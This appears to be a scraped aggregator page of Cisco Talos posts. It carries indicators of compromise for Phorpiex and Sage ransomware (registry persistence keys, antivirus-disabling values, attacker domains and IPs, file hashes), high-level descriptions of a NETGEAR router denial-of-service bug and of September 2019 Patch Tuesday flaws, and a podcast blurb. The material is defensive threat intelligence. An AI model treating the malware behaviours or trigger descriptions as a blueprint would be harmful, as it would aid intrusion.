
                  ThreatGrid


                  Umbrella


                  Win.Malware.Phorpiex-7145044-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                  Value Name: AntiVirusOverride
                  9
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                  Value Name: AntiVirusDisableNotify
                  9
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                  Value Name: FirewallDisableNotify
                  9
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                  Value Name: FirewallOverride
                  9
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                  Value Name: UpdatesDisableNotify
                  9
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE
                  Value Name: DisableSR
                  9
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                  Value Name: UpdatesOverride
                  9
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                  Value Name: AutoUpdateDisableNotify
                  9
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Microsoft Windows Driver
                  9
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                  Value Name: Microsoft Windows Driver
                  9
                  <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS 3
                  <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE 2
                  <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE\RECENT FILE LIST 2
                  <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\SORTANDLIFE\SETTINGS 2
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\75E0ABB6138512271C04F85FDDDE38E4B7242EFE
                  Value Name: Blob
                  1
                  <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR 1
                  <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR\RECENT FILE LIST 1
                  <HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS\HEXEDITOR\SETTINGS 1
                  MutexesOccurrences
                  50694035
                  50705084
                  rc/Administrator1
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  185[.]176[.]27[.]1329
                  7[.]5[.]7[.]79
                  208[.]100[.]26[.]2517
                  35[.]225[.]160[.]2457
                  193[.]32[.]161[.]735
                  68[.]178[.]213[.]371
                  66[.]218[.]85[.]1511
                  96[.]114[.]157[.]801
                  64[.]136[.]44[.]371
                  212[.]227[.]15[.]91
                  104[.]47[.]44[.]331
                  173[.]194[.]66[.]271
                  212[.]54[.]58[.]111
                  104[.]47[.]9[.]331
                  104[.]47[.]6[.]331
                  172[.]217[.]197[.]261
                  24[.]201[.]245[.]371
                  64[.]98[.]36[.]41
                  202[.]137[.]234[.]301
                  69[.]168[.]106[.]331
                  64[.]8[.]70[.]1041
                  34[.]212[.]80[.]541
                  212[.]227[.]15[.]101
                  209[.]17[.]115[.]101
                  104[.]20[.]17[.]2421
                  *See JSON for more IOCs
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  eguaheoghouughahse[.]top9
                  rzhsudhugugfugugso[.]io9
                  daedagheauehfuuhfp[.]co9
                  aeifaeifhutuhuhuse[.]top9
                  bfagzzezgaegzgfaik[.]su9
                  huaeokaefoaeguaeho[.]io9
                  aeoughaoheguaoehdl[.]cc9
                  gaohrhurhuhruhfsdk[.]su9
                  gaoehuoaoefhuhfugl[.]cc9
                  afaeigaifgsgrhhafo[.]io9
                  befaheaiudeuhughgl[.]cc9
                  aeufuaehfiuehfuhfe[.]top9
                  afaigaeigieufuifie[.]top9
                  aeoughaoheguaoehde[.]top9
                  gaghpaheiafhjefijo[.]io9
                  aegohaohuoruitiiep[.]co9
                  eaeuafhuaegfugeude[.]top9
                  eguaheoghouughahsp[.]co9
                  gaoehuoaoefhuhfugk[.]su9
                  rzhsudhugugfugugse[.]top9
                  afaigaeigieufuifik[.]su9
                  eaeuafhuaegfugeudo[.]io9
                  urusurofhsorhfuuho[.]io9
                  rzhsudhugugfugugsp[.]co9
                  bfagzzezgaegzgfail[.]cc9
                  *See JSON for more IOCs
                  Files and or directories createdOccurrences
                  %TEMP%\<random, matching [A-F0-9]{1,4}>.tmp10
                  \autorun.inf9
                  \.lnk9
                  \__\DriveMgr.exe9
                  E:\$RECYCLE.BIN9
                  E:\autorun.inf8
                  E:\__\DriveMgr.exe8
                  E:\.lnk8
                  E:\__8
                  %APPDATA%\winsvcs.txt8
                  E:\__\$RECYCLE.BIN7
                  E:\__\System Volume Information7
                  %TEMP%\20402.exe1
                  %TEMP%\27375.exe1
                  %TEMP%\14527.exe1
                  %TEMP%\13598.exe1
                  %TEMP%\26079.exe1
                  %TEMP%\25060.exe1
                  %TEMP%\37440.exe1
                  %TEMP%\39807.exe1
                  %TEMP%\10643.exe1
                  %TEMP%\16693.exe1
                  %TEMP%\11927.exe1
                  %TEMP%\29428.exe1
                  %TEMP%\14209.exe1
                  *See JSON for more IOCs

                  File Hashes

                  0d338324cf835af918aeb90f63e3d3e96f1f21136005162bff9eb7dff51d5efb 1924bd8e0c2679662f36c52fb7c1acb170e9ad71c55d1b53b70e55f3db71d644 48eac3b34c05886e1338554f54ca7022fa15215dd22d4a6bf62d6c531ba1a3f7 5e1d7375f3e2bb793908e0fa30b5d50e330024be2482f1d6be2c17395bd3b104 65ebf8cd6280fc0c6d3261ecb07e928dec08a6c3a9a814008faeb9053da5485e 6d65ccab03a62d84f12ac21fd02f44805c34696951e3dfb79ca042d8b832cd89 8a60f95d39f7255e1fd83aac66e0d922ca0a235069d7fca74a4ca07aa5ff5f96 c9d8bbeecb57aa0e4f59bad6e574470fe3ff8cc1685f38b16b6fa5435791231f de730a7cf6d436b4e93c0a857cd72074bb2bc1dfd5fda10e25125773711526a9 e0af9dcc27483bcdad52558aa19224a0338343e0456ad1e663e0b42fdd53520f

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella


                  Win.Ransomware.Sage-7144073-1

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
                  Value Name: GlobalAssocChangedCounter
                  14
                  <HKCU>\CONTROL PANEL\DESKTOP
                  Value Name: Wallpaper
                  14
                  <HKCR>\.SAGE 14
                  <HKCR>\SAGE.NOTICE\DEFAULTICON 14
                  <HKCR>\SAGE.NOTICE\FRIENDLYTYPENAME 14
                  <HKCR>\SAGE.NOTICE\SHELL\OPEN\COMMAND 14
                  <HKCR>\HTAFILE\DEFAULTICON 14
                  <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 14
                  <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
                  Value Name: PendingFileRenameOperations
                  14
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS
                  Value Name: _CommentFromDesktopINI
                  6
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS
                  Value Name: _LabelFromDesktopINI
                  6
                  <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\MOUNTPOINTS2\##PC#USERS 6
                  <HKCR>\.SAGE 1
                  <HKCR>\SAGE.NOTICE 1
                  <HKCR>\SAGE.NOTICE\DEFAULTICON 1
                  <HKCR>\SAGE.NOTICE\FRIENDLYTYPENAME 1
                  <HKCR>\SAGE.NOTICE\SHELL 1
                  <HKCR>\SAGE.NOTICE\SHELL\OPEN 1
                  <HKCR>\SAGE.NOTICE\SHELL\OPEN\COMMAND 1
                  <HKCR>\HTAFILE 1
                  <HKCR>\HTAFILE\DEFAULTICON 1
                  MutexesOccurrences
                  zHUoNUQ714
                  \BaseNamedObjects\PFShggN313
                  \BaseNamedObjects\adX9ZN6Z13
                  \BaseNamedObjects\nkB7lqma1
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  5[.]45[.]17[.]3614
                  5[.]45[.]100[.]13314
                  5[.]45[.]107[.]16114
                  5[.]45[.]107[.]16714
                  5[.]45[.]208[.]3614
                  138[.]197[.]5[.]5114
                  138[.]197[.]17[.]15614
                  138[.]197[.]90[.]3614
                  138[.]197[.]90[.]4014
                  138[.]197[.]90[.]6014
                  138[.]197[.]100[.]5114
                  138[.]197[.]107[.]1314
                  138[.]197[.]223[.]9914
                  139[.]59[.]5[.]19114
                  139[.]59[.]17[.]8014
                  139[.]59[.]46[.]4514
                  139[.]59[.]107[.]9114
                  139[.]59[.]125[.]814
                  139[.]59[.]125[.]15414
                  139[.]59[.]183[.]414
                  139[.]59[.]183[.]17014
                  139[.]59[.]184[.]13714
                  139[.]59[.]198[.]1214
                  139[.]59[.]198[.]4814
                  139[.]59[.]198[.]11614
                  *See JSON for more IOCs
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  mbfce24rgn65bx3g[.]jktew0[.]com14
                  mbfce24rgn65bx3g[.]jpo2z1[.]net14
                  Files and or directories createdOccurrences
                  %HOMEPATH%14
                  %System32%\Tasks\N0mFUQoa14
                  %TEMP%\__config252888.bat14
                  %APPDATA%\Rj3fNWF3.exe14
                  %APPDATA%\s1qoaKDO.tmp14
                  E:\!HELP_SOS.hta14
                  \!HELP_SOS.hta14
                  %TEMP%\DDx.bmp14
                  %APPDATA%\f1.hta14
                  %HOMEPATH%\Desktop\!HELP_SOS.hta14
                  %HOMEPATH%\Documents\!HELP_SOS.hta14
                  %HOMEPATH%\Documents\Outlook Files\!HELP_SOS.hta14
                  %PUBLIC%\Desktop\!HELP_SOS.hta14
                  %PUBLIC%\Documents\!HELP_SOS.hta14
                  %TEMP%\f1.vbs13

                  File Hashes

                  0558a89422c627ed31af6d34293b1de99ebd9f8538d8c29bf830b9302dd9aa56 25fd8664218cae1ca68b42245729c6cd00bbf3033704adf66c3ed56604d7e49c 42266cea4387c3bfa085ead6686fb91936a65bf8110c328b4e898771240e7b00 785c3dde4d85cd5ff2e1a826801c3813c2dd08fd547628aaf83bd9baeaf1f9c9 91a103e0a3a93dc681e7de5af18850933d2435a1d6cef35f85e7855f14c3ec02 9dd1839b1090c0467211f689214df91e5eb8e73830f2a2ea9e3408e527fe4096 a462ea6b325c5b91513498401fe7213cee84b61f04278616c51cae7238e57225 adf288cbaea7fadb2b2f152ebccab141a94cccce33d343fd9c5d42bfe65e57eb b238d1eb5e3ef4e3f5c93ead5032ad0bd67716ff555cf1a3649397ad2e3dcaef b5678f253a2c15a3caa25840b16421b4458928d0ddffaf1fb941a4aff1061f38 b61628da0124170e6bfeb5f282da74d06c5a6cffcd05681ce8cd069ec7831404 d59ec8d355d30d035faf50a342e1f1b67b44764db114a373c503098847718db3 d7e794446a774f9f3cacdbd58345a1a52f988eaff24c122800a9aa9b0e094e08 f44c64cc3c06ebb0c2e3333227e82568a14e7cc4400679cd85228f8882f0a416

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella


                  Malware




                  Exploit Prevention

                  Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                  CVE-2019-0708 detected - (5286)
                  An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                  Madshi injection detected - (2638)
                  Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
                  Kovter injection detected - (1427)
                  A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                  Process hollowing detected - (1081)
                  Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                  Trickbot malware detected - (220)
                  Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
                  Gamarue malware detected - (193)
                  Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                  Installcore adware detected - (97)
                  Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                  Excessively long PowerShell command detected - (65)
                  A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
                  PowerShell file-less infection detected - (49)
                  A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
                  Dealply adware detected - (30)
                  DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

                  Vulnerability Spotlight: Denial-of-service vulnerabilities in some NETGEAR routers

                  $
                  0
                  0

                  Dave McDaniel of Cisco Talos discovered these vulnerabilities.

                  The NETGEAR N300 line of wireless routers contains two denial-of-service vulnerabilities. The N300 is a small and affordable wireless router that contains the basic features of a wireless router. An attacker could exploit these bugs by sending specific SOAP and HTTP requests to different functions of the router, causing it to crash entirely.

                  In accordance with our coordinated disclosure policy, Cisco Talos worked with NETGEAR to ensure that these issues are resolved and that an update is available for affected customers.



                  Vulnerability details

                  NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability (TALOS-2019-0831/CVE-2019-5054)

                  An exploitable denial-of-service vulnerability exists in the session handling functionality of the NETGEAR N300 (WNR2000v5) HTTP server. An HTTP request with an empty User-Agent string sent to a page requiring authentication can cause a null pointer dereference, resulting in the HTTP service crashing. An unauthenticated attacker can send a specially crafted HTTP request to trigger this vulnerability.

                  Read the complete vulnerability advisory here for additional information.

                  NETGEAR N300 WNR2000v5 unauthenticated host access point daemon denial-of-service vulnerability (TALOS-2019-0832/CVE-2019-5055)

                  An exploitable denial-of-service vulnerability exists in the Host Access Point Daemon (hostapd) on the NETGEAR N300 (WNR2000v5) wireless router. A SOAP request sent in an invalid sequence to the <WFAWLANConfig:1#PutMessage> service can cause a null pointer dereference, resulting in the hostapd service crashing. An unauthenticated attacker can send a specially-crafted SOAP request to trigger this vulnerability.

                  Read the complete vulnerability advisory here for additional information.

                  Versions tested

                  Talos tested and confirmed that NETGEAR N300 WNR2000v5 router, firmware version V1.0.0.70, is affected by these vulnerabilities.

                  Coverage

                  The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                  Snort Rules: 50040

                  Microsoft Patch Tuesday — Sept. 2019: Vulnerability disclosures and Snort coverage

                  $
                  0
                  0











                  By Jon Munshaw.

                  Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 85 vulnerabilities, 19 of which are rated “critical," 65 that are considered "important" and one "moderate." There is also a critical advisory relating to the latest update to Adobe Flash Player.

                  This month’s security update covers security issues in a variety of Microsoft services and software, including the Jet Database Engine and the Hyper-V hypervisor.

                  Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities. For more, check out the Snort blog post here.

                  Critical vulnerabilities

                  Microsoft disclosed 19 critical vulnerabilities this month, all of which we will highlight below.

                  CVE-2019-1291, CVE-2019-1290, CVE-2019-0788 and CVE-2019-0787 are all remote code execution vulnerabilities in Windows Remote Desktop Protocol. An attacker can exploit these bugs by sending a specially crafted request to a client’s RDP software. If successful, the attacker could then gain the ability to execute arbitrary code. These vulnerabilities are pre-authentication and require no user interaction.

                  CVE-2019-1257CVE-2019-1296 and CVE-2019-1295 are remote code execution vulnerabilities in Microsoft SharePoint, a document manager and storage system. Some APIs in the software are exposed in unsafe ways, opening them up to exploitation if the user opens a specially crafted file. An attacker could exploit these vulnerabilities to gain the ability to execute code in the context of the SharePoint application pool and SharePoint server farm account.

                  CVE-2019-0719 and CVE-2019-0721 are remote code execution vulnerabilities in the Windows Hyper-V hypervisor. These bugs arise when the Hyper-V Network Switch on a host server improperly validates input from an authenticated user on a guest operating system. An attacker could exploit these by running a specially crafted application on a guest OS, potentially causing the Hyper-V host OS to execute arbitrary code.

                  CVE-2019-1138, CVE-2019-1217, CVE-2019-1237, CVE-2019-1298 and CVE-2019-1300 are remote code execution vulnerabilities in Chakra Scripting Engine when the engine attempts to handle objects in memory in the Microsoft Edge web browser. An attacker could exploit these bugs to corrupt memory on the target system, and then gain the ability to execute arbitrary code on the victim machine. A user can only trigger these vulnerabilities by clicking on an attacker-created web site in Microsoft Edge or a malicious ad on another site. CVE-2019-1221 is similar to these vulnerabilities, only it exists in Internet Explorer's scripting engine.

                  CVE-2019-1208 and CVE-2019-1236 are remote code executions in the VBScript engine that exist in the way the engine handles objects in memory. An attacker could exploit these vulnerabilities by tricking the user into visiting a specially crafted website on Internet Explorer. Additionally, they could embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that utilizes the Internet Explorer rendering engine.

                  CVE-2019-1280 is a vulnerability in Microsoft Windows that could allow an attacker to execute arbitrary code if they trick a user into opening a specially crafted .LNK file. If successful, the attacker could gain the same user rights as the local user.

                  CVE-2019-1306 is a remote code execution vulnerability that exists in Azure DevOps Server and Team Foundation Server when the software improperly validates certain inputs. An attacker could exploit this bug by tricking the user into opening a specially crafted file with a vulnerable version of the .NET Framework or Visual Studio. Additionally, the user could open a malicious attachment in an email. If successful, the attacker could execute code with the same rights as the current user.

                                Important vulnerabilities

                                This release also contains 65 important vulnerabilities, five of which we will highlight below.

                                CVE-2019-1214, CVE-2019-1215 and CVE-2019-1279 are elevation of privilege vulnerabilities in the Windows Common Log File System (CLFS) driver. An attacker could exploit these bugs to run certain processes with elevated rights. An attacker would need to log onto the target system first, and then run a specially crafted application. Information from Microsofts states that malicious users have already exploited these vulnerabilities in the wild.

                                CVE-2019-1216 and CVE-2019-1219 are vulnerabilities in DirectX that an attacker could exploit to see the contents of Kernel memory on the victim machine, which could allow them to execute additional attacks. These bugs exist in the way DirectX improperly handle objects in memory.

                                The other important vulnerabilities are:

                                Moderate vulnerability

                                There is one moderate vulnerability, CVE-2019-1259, a spoofing vulnerability in Microsoft SharePoint.

                                Coverage 

                                In response to these vulnerability disclosures, Talos is releasing a new SNORTⓇ rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

                                These rules are: 51436 - 51438, 51445, 51446, 51449 - 51452, 51454 - 51457, 51463 - 51465, 51479 - 51483

                                Beers with Talos Ep. #61: Hacking for good is a bad idea

                                $
                                0
                                0


                                Beers with Talos (BWT) Podcast episode No. 61 is now available. Download this episode and subscribe to Beers with Talos:

                                If iTunes and Google Play aren't your thing, click here.

                                Recorded Aug. 30, 2019: In this extra-sized episode, we cover a lot, starting with Retadup, and discussing the intricate workings of why it’s a bad idea to execute code on other computers without permission when you have no idea what that computer is doing. WannaCry is making some headlines again, but this time it isn’t WannaCry and, frankly, it’s not news. From the mobile ecosystem operating system battleground, Google’s Project Zero announced several vulnerabilities in iOS that have been discovered being exploited in the wild, with some of the exploit chains leveraging zero-days. The most important development of the week is that journalists are now quoting Matt's Twitter timeline and this will certainly end well.

                                The timeline:

                                • 01:30 — Roundtable: Telecasters, Joel requests drunk calls, what your Twix choices say about you.
                                • 15:15 — Retadup takedown: Let’s chat about running code on other people’s computers (hint: it’s a bad idea).
                                • 29:25 — WannaCry (but not really) is still a threat to things it’s already been hitting since forever. Surprise.
                                • 42:50 — Project Zero uncovers several exploit chains containing Apple/iPhone zero-day.
                                • 55:55 — Closing thoughts and parting shots.
                                ==========

                                Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                                Hosted by Mitch Neff (@MitchNeff)

                                Subscribe via iTunes (and leave a review!)


                                Subscribe to the Threat Source newsletter


                                Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

                                Viewing all 1927 articles
                                Browse latest View live


                                <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>